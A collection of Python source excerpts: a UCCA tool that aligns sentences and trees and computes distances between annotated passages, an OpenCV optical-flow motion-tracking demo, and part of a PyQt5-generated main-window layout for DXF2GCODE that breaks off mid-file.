Breaking is done according to the text and to the ucca annotation of both passages
returns two lists each containing positions of sentence endings
guarentees same number of positions is acquired and the last position is the passage end"""
# break to sentences
broken1 = break2sentences(p1)
broken2 = break2sentences(p2)
# find common endings
positions1 = []
positions2 = []
i = 0
j = 0
while j < len(broken2) and i < len(broken1):
position1, reg1 = _choose_ending_position(p1, broken1[i])
position2, reg2 = _choose_ending_position(p2, broken2[j])
if i + 1 < len(broken1):
pos_after1, one_after1 = _choose_ending_position(p1, broken1[i + 1])
else:
pos_after1, one_after1 = position1, reg1
if j + 1 < len(broken2):
pos_after2, one_after2 = _choose_ending_position(p2, broken2[j + 1])
else:
pos_after2, one_after2 = position2, reg2
if reg1 == reg2:
positions1.append(position1)
positions2.append(position2)
# deal with addition or subtraction of a sentence ending
elif one_after1 == reg2:
i += 1
positions1.append(pos_after1)
positions2.append(position2)
elif reg1 == one_after2:
j += 1
positions1.append(position1)
positions2.append(pos_after2)
i += 1
j += 1
# add last sentence in case skipped
position1, reg1 = _choose_ending_position(p1, broken1[-1])
position2, reg2 = _choose_ending_position(p2, broken2[-1])
if (not positions1) or (not positions2) or (
positions1[-1] != position1 and positions2[-1] != position2):
positions1.append(broken1[-1])
positions2.append(broken2[-1])
elif positions1[-1] != position1 and positions2[-1] == position2:
positions1[-1] = position1
elif positions1[-1] == position1 and positions2[-1] != position2:
positions2[-1] = broken2[-1]
return positions1, positions2
def reverse_mapping(word2word):
"""gets an iterator of tuples and returns a set of the reveresed mapping"""
return set((j, i) for (i, j) in word2word)
def align_yields(p1, p2):
"""finds the best alignment of words from two passages
Note: this function is symetrical
consider using reverse_mapping instead of calling it twice
returns iterator of tuples (i,j)
mapping from i - p1 positions
to j - aligned p2 positions"""
positions1, positions2 = break2common_sentences(p1, p2)
terminals1 = extract_terminals(p1)
terminals2 = extract_terminals(p2)
# map the words in each sentence to each other
if len(positions1) == len(positions2):
mapping = set()
sentence_start1 = 0
sentence_start2 = 0
for i in range(len(positions1)):
sentence1 = terminals1[sentence_start1:positions1[i]]
sentence2 = terminals2[sentence_start2:positions2[i]]
for (j, k) in align(sentence1, sentence2, False)[1]:
if j != -1:
j += sentence_start1
if k != -1:
k += sentence_start2
mapping.add((j, k))
sentence_start1 = positions1[i]
sentence_start2 = positions2[i]
return mapping
else:
print("Error number of sentences aqquired from break2common_sentences does not match")
def fully_aligned_distance(p1, p2):
"""compares each one to its' best mapping"""
word2word = align_yields(p1, p2)
nodes1 = set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))
nodes2 = set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))
first = align_nodes(nodes1, nodes2, word2word)
word2word = reverse_mapping(word2word)
second = align_nodes(nodes2, nodes1, word2word)
count1 = len(set((i, j) for (i, j) in first.items() if compare(i, j)))
count2 = len(set((i, j) for (i, j) in second.items() if compare(i, j)))
print(inspect.currentframe().f_code.co_name, " returns ", two_sided_f(count1, count2, len(nodes1), len(nodes2)))
return two_sided_f(count1, count2, len(nodes1), len(nodes2))
MAIN_RELATIONS = [layer1.EdgeTags.ParallelScene,
layer1.EdgeTags.Participant,
layer1.EdgeTags.Adverbial
]
def token_matches(p1, p2, map_by):
"""returns the number of matched tokens from p1 with tag from MAIN_RELATIONS
p1,p2 passages
map_by a function that maps all nodes from p1 to p2 nodes
Note: this function is noy simmetrical"""
count = 0
mapping = map_by(p1, p2)
print("mapping length", len(mapping))
for node1, node2 in mapping.items():
if is_comparable(node1) and is_comparable(node2) and label(node1) in MAIN_RELATIONS and compare(node1, node2):
count += 1
return count
def token_distance(p1, p2, map_by=buttom_up_by_levels_align):
"""compares considering only the main relation of each node"""
count1 = token_matches(p1, p2, map_by)
count2 = token_matches(p2, p1, map_by)
nodes1 = set(node for node in p1.layer(layer1.LAYER_ID).all
if is_comparable(node) and label(node) in MAIN_RELATIONS)
nodes2 = set(node for node in p2.layer(layer1.LAYER_ID).all
if is_comparable(node) and label(node) in MAIN_RELATIONS)
print(inspect.currentframe().f_code.co_name)
print("counts", count1, count2)
print("lens", len(nodes1), len(nodes2))
print(two_sided_f(count1, count2, len(nodes1), len(nodes2)))
return two_sided_f(count1, count2, len(nodes1), len(nodes2))
def tree_structure(n):
""" gets a node and returns a tree structure from it"""
childrn = []
for child in n.children:
child = tree_structure(child)
if child:
childrn.append(child)
return n, childrn
def tree_structure_aligned(n1, n2, word2word):
""" gets two nodes and returns a tree structure from each with the proper mapping"""
tree1 = []
tree2 = []
mapping = align_nodes(n1.children, n2.children, word2word)
# add matching
for s in mapping:
if s in mapping and mapping[s] not in tree2:
tree1.append(s)
tree2.append(mapping[s])
# add not matching
for s in n1.children:
if s not in tree1:
tree1.append(s)
for s in n2.children:
if s not in tree2:
tree2.append(s)
# convert recursivly
longer = max(len(n1.children), len(n2.children))
shorter = min(len(n1.children), len(n2.children))
res1 = []
res2 = []
for i in range(shorter):
t1, t2 = tree_structure_aligned(tree1[i], tree2[i], word2word)
res1.append(t1)
res2.append(t2)
if len(n1.children) == longer:
res1 += [tree_structure(n) for n in n1.children[shorter:]]
if len(n2.children) == longer:
res2 += [tree_structure(n) for n in n2.children[shorter:]]
return (n1, res1), (n2, res2)
def convert_structure_to_zss(tree):
lbl = label(tree[0]) if hasattr(tree[0], "ftag") else str(type(tree[0]))
return zss.Node(lbl, [convert_structure_to_zss(n) for n in tree[1]])
def prune_leaves(tree, flter=lambda x: True):
""" takes a tree structure and prunes the leaves, for a single nodes without leaves returns t
tree
filter - a boolean function that gets a node and decides whether it should be left out,
this filters only leaves that this function returns true for"""
if tree[1]:
res = []
for t in tree[1]:
if t[1]:
pruned = prune_leaves(t)
if pruned or not flter(tree[0]):
res.append(pruned)
return tree[0], [n for n in res if n is not None]
return
def create_ordered_trees(p1, p2, word2word=None):
""" creates two trees from two passages"""
if not word2word:
word2word = align_yields(p1, p2)
top1 = top_from_passage(p1)
top2 = top_from_passage(p2)
mapping = align_nodes(top1, top2, word2word)
tree1 = []
tree2 = []
for s in top_from_passage(p1):
if s in mapping and mapping[s] not in tree2:
tree1.append(s)
tree2.append(mapping[s])
for s in top_from_passage(p1):
if s not in tree1:
tree1.append(s)
for s in top_from_passage(p2):
if s not in tree2:
tree2.append(s)
# convert recursivly
longer = max(len(top1), len(top2))
shorter = min(len(top1), len(top2))
res1 = []
res2 = []
for i in range(shorter):
t1, t2 = tree_structure_aligned(tree1[i], tree2[i], word2word)
res1.append(t1)
res2.append(t2)
if len(top1) == longer:
res1 += [tree_structure(n) for n in top1[shorter:]]
if len(top2) == longer:
res2 += [tree_structure(n) for n in top2[shorter:]]
res1 = prune_leaves((p1, res1))
res2 = prune_leaves((p2, res2))
res1 = prune_leaves(res1, lambda x: not is_comparable(x))
res2 = prune_leaves(res2, lambda x: not is_comparable(x))
return res1, res2
def aligned_edit_distance(p1, p2):
""" uses the aligned trees for labeled tree edit distance"""
tree1, tree2 = create_ordered_trees(p1, p2)
return zss.simple_distance(convert_structure_to_zss(tree1), convert_structure_to_zss(tree2))
def token_level_similarity(p1, p2):
return token_level_analysis([p1, p2])
def token_level_analysis(ps):
""" takes a list of passages and computes the different token-level analysis"""
s, e, f = {}, {}, {}
i = 0
while i < len(ps):
p1 = ps[i]
i += 1
p2 = ps[i]
i += 1
count1 = Counter((label(node) for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node)))
count2 = Counter((label(node) for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node)))
for tag in MAIN_RELATIONS:
f[tag] = f.get(tag, 0) + count1[tag]
e[tag] = e.get(tag, 0) + count2[tag]
s[tag] = s.get(tag, 0) + min(count1[tag], count2[tag])
ADs = "As + Ds"
s[ADs] = s[layer1.EdgeTags.Participant] + s[layer1.EdgeTags.Adverbial]
e[ADs] = e[layer1.EdgeTags.Participant] + e[layer1.EdgeTags.Adverbial]
f[ADs] = f[layer1.EdgeTags.Participant] + f[layer1.EdgeTags.Adverbial]
P = {}
R = {}
res = {}
for tag in MAIN_RELATIONS + [ADs]:
P[tag] = s[tag] / f[tag]
R[tag] = s[tag] / e[tag]
res[tag] = 2 * (P[tag] * R[tag]) / (P[tag] + R[tag])
return res
def aligned_top_down_distance(p1, p2):
"""starts from the heads of both passages
and finds the amount of nodes
containing the same labeles for children"""
word2word = align_yields(p1, p2)
remaining = align_nodes(top_from_passage(p1), top_from_passage(p2), word2word)
uncounted = {}
cut1 = set()
cut2 = set()
overall1 = set()
overall2 = set()
# top down create find the maximum cut of matching nodes
while remaining:
n1, n2 = remaining.popitem()
if is_comparable(n1) and is_comparable(n2):
# remember overall nodes
overall1.add(n1)
overall2.add(n2)
if compare(n1, n2):
cut1.add(n1)
cut2.add(n2)
remaining.update(align_nodes(n1.children, n2.children, word2word))
else:
# remember the end of the cut
uncounted.update(align_nodes(n1.children, n2.children, word2word))
elif (not is_terminal(n1)) and (not is_terminal(n2)):
remaining.update(align_nodes(n1.children, n2.children, word2word))
# check nodes not in the cut
while uncounted:
n1, n2 = uncounted.popitem()
if is_comparable(n1) and is_comparable(n2):
overall1.add(n1)
overall2.add(n2)
if (not is_terminal(n1)) and (not is_terminal(n2)):
uncounted.update(align_nodes(n1.children, n2.children, word2word))
# overall1 = set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))
# overall2 = set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))
print(inspect.currentframe().f_code.co_name)
print(len(set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))))
print(len(set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))))
print("counts", len(cut1), len(cut2))
print("lens", len(overall1), len(overall2))
print(two_sided_f(len(cut1), len(cut2), len(overall1), len(overall2)))
return two_sided_f(len(cut1), len(cut2), len(overall1), len(overall2))
| danielhers/ucca | scripts/distances/align.py | Python | gpl-3.0 | 23,754 |
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
# params for ShiTomasi corner detection
feature_params = dict( maxCorners = 100,
qualityLevel = 0.3,
minDistance = 7,
blockSize = 7 )
# Parameters for lucas kanade optical flow
lk_params = dict( winSize = (15,15),
maxLevel = 2,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
# Create some random colors
color = np.random.randint(0,255,(100,3))
# Take first frame and find corners in it
ret, old_frame = cap.read()
old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
p0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)
# Create a mask image for drawing purposes
mask = np.zeros_like(old_frame)
while(1):
ret,frame = cap.read()
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# calculate optical flow
p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)
# Select good points
good_new = p1[st==1]
good_old = p0[st==1]
# draw the tracks
for i,(new,old) in enumerate(zip(good_new,good_old)):
a,b = new.ravel()
c,d = old.ravel()
mask = cv2.line(mask, (a,b),(c,d), color[i].tolist(), 2)
frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1)
img = cv2.add(frame,mask)
cv2.imshow('frame',img)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
# Now update the previous frame and previous points
old_gray = frame_gray.copy()
p0 = good_new.reshape(-1,1,2)
cv2.destroyAllWindows()
cap.release() | epson121/ComputerGraphics | project/motion_tracking.py | Python | mit | 1,639 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/tmp/tmpqVBIL1'
#
# Created by: PyQt5 UI code generator 5.5
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(800, 600)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/images/DXF2GCODE-001.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(-1, -1, -1, 2)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.splitter = QtWidgets.QSplitter(self.centralwidget)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName("splitter")
self.mytabWidget = QtWidgets.QTabWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(2)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mytabWidget.sizePolicy().hasHeightForWidth())
self.mytabWidget.setSizePolicy(sizePolicy)
self.mytabWidget.setMinimumSize(QtCore.QSize(200, 0))
self.mytabWidget.setAutoFillBackground(False)
self.mytabWidget.setObjectName("mytabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setSpacing(1)
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.blocksCollapsePushButton = QtWidgets.QPushButton(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.blocksCollapsePushButton.sizePolicy().hasHeightForWidth())
self.blocksCollapsePushButton.setSizePolicy(sizePolicy)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/images/collapse-all.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.blocksCollapsePushButton.setIcon(icon1)
self.blocksCollapsePushButton.setIconSize(QtCore.QSize(24, 24))
self.blocksCollapsePushButton.setObjectName("blocksCollapsePushButton")
self.horizontalLayout_5.addWidget(self.blocksCollapsePushButton)
self.blocksExpandPushButton = QtWidgets.QPushButton(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.blocksExpandPushButton.sizePolicy().hasHeightForWidth())
self.blocksExpandPushButton.setSizePolicy(sizePolicy)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/images/expand-all.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.blocksExpandPushButton.setIcon(icon2)
self.blocksExpandPushButton.setIconSize(QtCore.QSize(24, 24))
self.blocksExpandPushButton.setObjectName("blocksExpandPushButton")
self.horizontalLayout_5.addWidget(self.blocksExpandPushButton)
spacerItem = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem)
self.verticalLayout_3.addLayout(self.horizontalLayout_5)
self.entitiesTreeView = TreeView(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.entitiesTreeView.sizePolicy().hasHeightForWidth())
self.entitiesTreeView.setSizePolicy(sizePolicy)
self.entitiesTreeView.setObjectName("entitiesTreeView")
self.verticalLayout_3.addWidget(self.entitiesTreeView)
self.mytabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_5.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_5.setSpacing(1)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setSpacing(1)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.layersCollapsePushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersCollapsePushButton.sizePolicy().hasHeightForWidth())
self.layersCollapsePushButton.setSizePolicy(sizePolicy)
self.layersCollapsePushButton.setIcon(icon1)
self.layersCollapsePushButton.setIconSize(QtCore.QSize(24, 24))
self.layersCollapsePushButton.setObjectName("layersCollapsePushButton")
self.horizontalLayout_4.addWidget(self.layersCollapsePushButton)
self.layersExpandPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersExpandPushButton.sizePolicy().hasHeightForWidth())
self.layersExpandPushButton.setSizePolicy(sizePolicy)
self.layersExpandPushButton.setIcon(icon2)
self.layersExpandPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersExpandPushButton.setObjectName("layersExpandPushButton")
self.horizontalLayout_4.addWidget(self.layersExpandPushButton)
spacerItem1 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem1)
self.layersGoUpPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersGoUpPushButton.sizePolicy().hasHeightForWidth())
self.layersGoUpPushButton.setSizePolicy(sizePolicy)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/images/go-up.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.layersGoUpPushButton.setIcon(icon3)
self.layersGoUpPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersGoUpPushButton.setObjectName("layersGoUpPushButton")
self.horizontalLayout_4.addWidget(self.layersGoUpPushButton)
self.layersGoDownPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersGoDownPushButton.sizePolicy().hasHeightForWidth())
self.layersGoDownPushButton.setSizePolicy(sizePolicy)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/images/go-down.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.layersGoDownPushButton.setIcon(icon4)
self.layersGoDownPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersGoDownPushButton.setObjectName("layersGoDownPushButton")
self.horizontalLayout_4.addWidget(self.layersGoDownPushButton)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
self.layersShapesTreeView = TreeView(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersShapesTreeView.sizePolicy().hasHeightForWidth())
self.layersShapesTreeView.setSizePolicy(sizePolicy)
self.layersShapesTreeView.setObjectName("layersShapesTreeView")
self.verticalLayout_5.addWidget(self.layersShapesTreeView)
self.millSettingsFrame = QtWidgets.QFrame(self.tab_2)
self.millSettingsFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.millSettingsFrame.setFrameShadow(QtWidgets.QFrame.Raised)
self.millSettingsFrame.setLineWidth(0)
self.millSettingsFrame.setObjectName("millSettingsFrame")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.millSettingsFrame)
self.verticalLayout_4.setContentsMargins(2, 2, 2, 2)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setSpacing(2)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.toolDiameterComboBox = QtWidgets.QComboBox(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolDiameterComboBox.sizePolicy().hasHeightForWidth())
self.toolDiameterComboBox.setSizePolicy(sizePolicy)
self.toolDiameterComboBox.setMaxVisibleItems(20)
self.toolDiameterComboBox.setObjectName("toolDiameterComboBox")
self.horizontalLayout_3.addWidget(self.toolDiameterComboBox)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label_11 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_11.sizePolicy().hasHeightForWidth())
self.label_11.setSizePolicy(sizePolicy)
self.label_11.setObjectName("label_11")
self.horizontalLayout.addWidget(self.label_11)
self.toolDiameterLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolDiameterLabel.sizePolicy().hasHeightForWidth())
self.toolDiameterLabel.setSizePolicy(sizePolicy)
self.toolDiameterLabel.setText("[mm]")
self.toolDiameterLabel.setObjectName("toolDiameterLabel")
self.horizontalLayout.addWidget(self.toolDiameterLabel)
self.label_12 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_12.sizePolicy().hasHeightForWidth())
self.label_12.setSizePolicy(sizePolicy)
self.label_12.setObjectName("label_12")
self.horizontalLayout.addWidget(self.label_12)
self.toolSpeedLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolSpeedLabel.sizePolicy().hasHeightForWidth())
self.toolSpeedLabel.setSizePolicy(sizePolicy)
self.toolSpeedLabel.setText("[rpm]")
self.toolSpeedLabel.setObjectName("toolSpeedLabel")
self.horizontalLayout.addWidget(self.toolSpeedLabel)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_13 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_13.sizePolicy().hasHeightForWidth())
self.label_13.setSizePolicy(sizePolicy)
self.label_13.setObjectName("label_13")
self.horizontalLayout_2.addWidget(self.label_13)
self.startRadiusLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startRadiusLabel.sizePolicy().hasHeightForWidth())
self.startRadiusLabel.setSizePolicy(sizePolicy)
self.startRadiusLabel.setText("[mm]")
self.startRadiusLabel.setObjectName("startRadiusLabel")
self.horizontalLayout_2.addWidget(self.startRadiusLabel)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3.addLayout(self.verticalLayout_2)
self.verticalLayout_4.addLayout(self.horizontalLayout_3)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setHorizontalSpacing(2)
self.gridLayout.setVerticalSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.zInitialMillDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zInitialMillDepthLineEdit.sizePolicy().hasHeightForWidth())
self.zInitialMillDepthLineEdit.setSizePolicy(sizePolicy)
self.zInitialMillDepthLineEdit.setObjectName("zInitialMillDepthLineEdit")
self.gridLayout.addWidget(self.zInitialMillDepthLineEdit, 4, 1, 1, 1)
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_13.setSpacing(2)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.label_7 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_7.setWordWrap(True)
self.label_7.setObjectName("label_7")
self.horizontalLayout_13.addWidget(self.label_7)
self.unitLabel_8 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_8.setText("[mm/min]")
self.unitLabel_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_8.setObjectName("unitLabel_8")
self.horizontalLayout_13.addWidget(self.unitLabel_8)
self.gridLayout.addLayout(self.horizontalLayout_13, 7, 0, 1, 1)
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_12.setSpacing(2)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_8 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_8.setObjectName("label_8")
self.horizontalLayout_12.addWidget(self.label_8)
self.unitLabel_7 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_7.setText("[mm]")
self.unitLabel_7.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_7.setObjectName("unitLabel_7")
self.horizontalLayout_12.addWidget(self.unitLabel_7)
self.gridLayout.addLayout(self.horizontalLayout_12, 6, 0, 1, 1)
self.zInfeedDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zInfeedDepthLineEdit.sizePolicy().hasHeightForWidth())
self.zInfeedDepthLineEdit.setSizePolicy(sizePolicy)
self.zInfeedDepthLineEdit.setObjectName("zInfeedDepthLineEdit")
self.gridLayout.addWidget(self.zInfeedDepthLineEdit, 5, 1, 1, 1)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_11.setSpacing(2)
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.label_9 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_9.setObjectName("label_9")
self.horizontalLayout_11.addWidget(self.label_9)
self.unitLabel_6 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_6.setText("[mm]")
self.unitLabel_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_6.setObjectName("unitLabel_6")
self.horizontalLayout_11.addWidget(self.unitLabel_6)
self.gridLayout.addLayout(self.horizontalLayout_11, 5, 0, 1, 1)
self.zSafetyMarginLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zSafetyMarginLineEdit.sizePolicy().hasHeightForWidth())
self.zSafetyMarginLineEdit.setSizePolicy(sizePolicy)
self.zSafetyMarginLineEdit.setObjectName("zSafetyMarginLineEdit")
self.gridLayout.addWidget(self.zSafetyMarginLineEdit, 3, 1, 1, 1)
self.zFinalMillDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zFinalMillDepthLineEdit.sizePolicy().hasHeightForWidth())
